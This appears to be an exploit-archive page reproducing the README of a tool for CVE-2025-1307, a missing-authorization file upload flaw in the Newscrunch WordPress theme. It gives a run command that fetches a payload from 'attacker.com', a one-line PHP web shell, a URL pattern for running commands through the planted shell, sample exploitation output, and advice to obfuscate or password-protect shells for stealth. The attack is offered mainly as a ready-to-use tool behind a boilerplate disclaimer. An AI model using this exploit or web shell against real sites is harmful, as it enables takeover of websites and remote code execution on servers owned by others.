Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-1307 PoC — WordPress plugin Newscrunch 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin Newscrunch 安全漏洞 (CVE-2025-1307)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Newscrunch 1.8.4.1及之前版本存在安全漏洞,该漏洞源于缺少能力检查,可能导致任意文件上传和远程代码执行。
Description
Newscrunch <= 1.8.4 - Authenticated (Subscriber+) Arbitrary File Upload
Readme
# Newscrunch Exploit (CVE-2025-1307)

## 🚨 Overview
This exploit targets a critical vulnerability (**CVE-2025-1307**) in the **Newscrunch WordPress theme**. The flaw allows **authenticated users (Subscriber and above)** to upload arbitrary files due to missing capability checks in the `newscrunch_install_and_activate_plugin()` function. This can lead to **Remote Code Execution (RCE)**, compromising the affected WordPress site completely.

---

## 🔥 Vulnerability Details
- **CVE ID:** CVE-2025-1307
- **Affected Software:** Newscrunch WordPress Theme (<= 1.8.4.1)
- **CWE Classification:** [CWE-862 - Missing Authorization](https://cwe.mitre.org/data/definitions/862.html)
- **CVSS Score:** **9.8 (Critical)**
- **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **Published Date:** March 4, 2025

### 🛑 Severity & Impact
- ✅ **Remote Code Execution (RCE)**
- ✅ **Full System Compromise**
- ✅ **Unauthorized File Upload**
- ✅ **Privilege Escalation Risk**

**Exploitability:** Requires a valid WordPress account with **Subscriber privileges or higher**.

---

## 📜 Script Features
✅ **Automated Exploitation of CVE-2025-1307**  
✅ **Auto-detection of vulnerable theme version**  
✅ **Automatic ZIP payload extraction and execution**  
✅ **Retrieves shell file name dynamically from ZIP**  
✅ **Auto-checks shell availability after exploitation**  
✅ **Clean and structured logging for debugging**  

---

## 🚀 How to Use

### 📌 Prerequisites
Ensure you have **Python 3.x** installed and install the required dependencies:
```bash
pip install requests urllib3 packaging
```

### 🔧 Running the Exploit
```bash
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
```

### 🔹 Usage
```
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload
```

### 🛠️ Using the Uploaded Shell
Once the shell is successfully uploaded, it allows remote command execution on the target system. The shell file should be placed inside a ZIP archive, and it will be extracted automatically upon exploitation.

### 🔹 Creating the ZIP Payload
Ensure your PHP shell (shell.php) is inside a ZIP archive. Then, upload the ZIP file using the exploit.
```php
<?php system($_GET['cmd']); ?>
```

### 🔹 Executing Commands
You can execute system commands via the browser by appending the cmd parameter to the shell URL:
```
http://target/wp-content/plugins/shell.php?cmd=whoami
```

### ⚠️ Securing the Shell
- Since this is a simple web shell, it lacks authentication and should be used cautiously.
- If detected, it can be easily removed by administrators.
- Consider using obfuscated PHP code or password-protected shells for stealth operations.

### 🔹 Expected Output
```
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
```

### ⚠️ Disclaimer
This tool is for educational and security research purposes only. Unauthorized exploitation of vulnerabilities is illegal and punishable by law. The author is not responsible for any misuse or damages caused by this tool. Use responsibly. 


*By: Nxploit | Khaled Alenazi*
File Snapshot

[4.0K] /data/pocs/90a68eb28d0e9ace13bfe2e7831976d6b687e965 ├── [6.5K] CVE-2025-1307.py └── [3.8K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.